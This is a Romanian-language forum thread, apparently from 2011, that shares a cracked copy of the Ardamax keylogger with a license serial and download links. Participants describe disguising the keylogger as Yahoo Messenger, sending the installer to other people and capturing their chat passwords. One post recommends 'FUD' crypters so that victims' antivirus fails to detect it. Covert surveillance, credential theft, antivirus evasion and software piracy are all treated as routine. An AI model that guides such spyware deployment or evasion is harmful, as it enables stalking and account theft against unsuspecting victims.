Alexie Posted June 1, 2011 Report Posted June 1, 2011 Am vazut ca e un post in care e pus cu virus...si mam decis sa caut si sa il pun ca sa il poata lua tot omu fara grija virusului..Serial: Nume: Popescu Marian Code: 083A-E649-5E15Download link:2shared - download full_akl 3.7.8.exeNu va luati dupa nr meu de posturi ..daca e vreo problema...ziceti si incerc sa rezolvL.E. pt cei care sunt incepatori si nu stiu sa il foloseasca...aici e tutorialul de la 2.8..la 3.7.8 e cam tot asa: http://rstcenter.com/forum/17138-tutorial-keylogger.rst Quote
daatdraqq Posted June 1, 2011 Report Posted June 1, 2011 Pana sa te "decizi" tu sa-l pui , s-a decis cel care l-a cumparat si l-a pus inaintea ta .http://rstcenter.com/forum/31323-ardamax-keylogger-v3-5-3-serial-%5Bonly-here%5D.rst Quote
Alexitul Posted September 14, 2011 Report Posted September 14, 2011 salut baieti.. eu am incercat sa-l instalez dar dupa ce l-am instalat zice ca are Trojan.. si nu-mi ruleaza ... ce pot face ? ca antivirus am Bitdefender Quote
bubu2005 Posted September 14, 2011 Report Posted September 14, 2011 salut baieti.. eu am incercat sa-l instalez dar dupa ce l-am instalat zice ca are Trojan.. si nu-mi ruleaza ... ce pot face ? ca antivirus am BitdefenderIa vezi asta nu merge?Multiupload.com - upload your files to multiple file hosting sites! Quote
foxriver Posted September 16, 2011 Report Posted September 16, 2011 Aproape ca merge, dupa instalare a functionat cateva minute , inregistreaza yahoo chat, web browsing, username + pass la YM, dar dupa un timp nu mai arata log. Apare mesajul " Log Viewer not installed". Pacat , chiar aveam nevoie de o versiune functionala. Quote
Alexander33 Posted September 24, 2011 Report Posted September 24, 2011 Aproape ca merge, dupa instalare a functionat cateva minute , inregistreaza yahoo chat, web browsing, username + pass la YM, dar dupa un timp nu mai arata log. Apare mesajul " Log Viewer not installed". Pacat , chiar aveam nevoie de o versiune functionala.ti l-a sters antivirusul sau Windows Defender-ul daca ai win7 Quote
barbyboy Posted September 24, 2011 Report Posted September 24, 2011 please helpSerial: Nume: Popescu MarianCode: 083A-E649-5E15Serial&Codenot work Quote
Finutu Posted September 24, 2011 Report Posted September 24, 2011 Pe versiunea 3.8.3 functioneaza licenta , pe versiunea asta de aici nu stiu daca merge ca nu am testat.Vers. 3.8.3 care o folosesc eu si functioneaza perfect:MEGAUPLOAD - The leading online storage and file delivery serviceIn arhiva e acelasi serial ca cel postat aici. Quote
zblink Posted October 14, 2011 Report Posted October 14, 2011 Cand dau la remote installation imi spune please download full version. Bag datele acolo pe site si imi zice: cod incorect.Cum fac mai departe?Am luat versiunea 3.8.4. Quote
alborosie Posted October 26, 2011 Report Posted October 26, 2011 am facut exact cum era acolo am pus numele virusului Yahoo Messenger 12 deschid aplicatia o vad ardamax keylogger in bara dar cand dau dublu clik pe el imi da eroarea : "C:\windows\system32\28463\AQCG.005'web log fie corupted va rog ajutatimaa si scuzatima daca am postat unde nu trebuie dar sunt nou pe acest forum Quote
alborosie Posted October 26, 2011 Report Posted October 26, 2011 eu am facut cum scria pe prima pagina la key logger 2.8 va rog raspuns repede Quote
Dyad Posted October 31, 2011 Report Posted October 31, 2011 O intrebare...la rezultatul scanarii, jumatate din programele antivirus mi-l detecteaza..deci daca il dau cuiva si are antivirus sunt sanse mari sa nu il deschida/stearga/etc. Aveti vreo sugestie pentru asta? Quote
DrPsychO Posted October 31, 2011 Report Posted October 31, 2011 (edited) O intrebare...la rezultatul scanarii, jumatate din programele antivirus mi-l detecteaza..deci daca il dau cuiva si are antivirus sunt sanse mari sa nu il deschida/stearga/etc. Aveti vreo sugestie pentru asta?Cauta un crypter bun. Gasesti o gramada pe forum.E destul de bun, mie mi-a fost de folos si asta : http://rstcenter.com/forum/42103-li0n-polymorphic-crypter-v1-1-%5Bfud%5D.rst Le poti testa pe aman2 sa vezi de care esti mai multumit. Edited October 31, 2011 by DrPsychO 1 Quote
Dyad Posted October 31, 2011 Report Posted October 31, 2011 (edited) Cauta un crypter bun. Gasesti o gramada pe forum.Imi cer scuze..dar sunt cam noob in ceea ce inseamna crypter. Luat dupa denumire, inseamna sa criptezi ceva. Nu am folosit niciodata, dar presupun ca o sa cripteze acel "program" astfel incat sa treaca niste teste / sau sa il scrie in alt mod.(am I right?) Imi poti totusi recomanda unul? (bun, rau, cum o fi el)PS: mersi de raspunsul prompt!Edit: http://rstcenter.com/forum/41792-antihelix_crypter-4.rst e bun?Final edit: am reusit, mersi mult de ajutor! Edited October 31, 2011 by Dyad Quote
FaceToFace Posted February 5, 2012 Report Posted February 5, 2012 Nu este un virus ci 2 virusi! Quote
MagicThunder Posted February 5, 2012 Report Posted February 5, 2012 Pai deh daca nici un amarat de keylogger nu puteti instala si configura atunci nene duceti-va la counter strike.Numai mura in gura vreti, documentati-va pe google, folositi virtual machine daca aveti indoieli, jucati-va cu el vedeti ce face. Quote
relaxatul Posted February 7, 2012 Report Posted February 7, 2012 salut , eu am instalat ardamax 3.7.8 nu imi trimite mail decat de la pc meu , am trimis la vreo 4 baieti fisieru install.exe din htv , nimik ... am instalat apoi si ver 2.8 nothing ... what`s happend ? Quote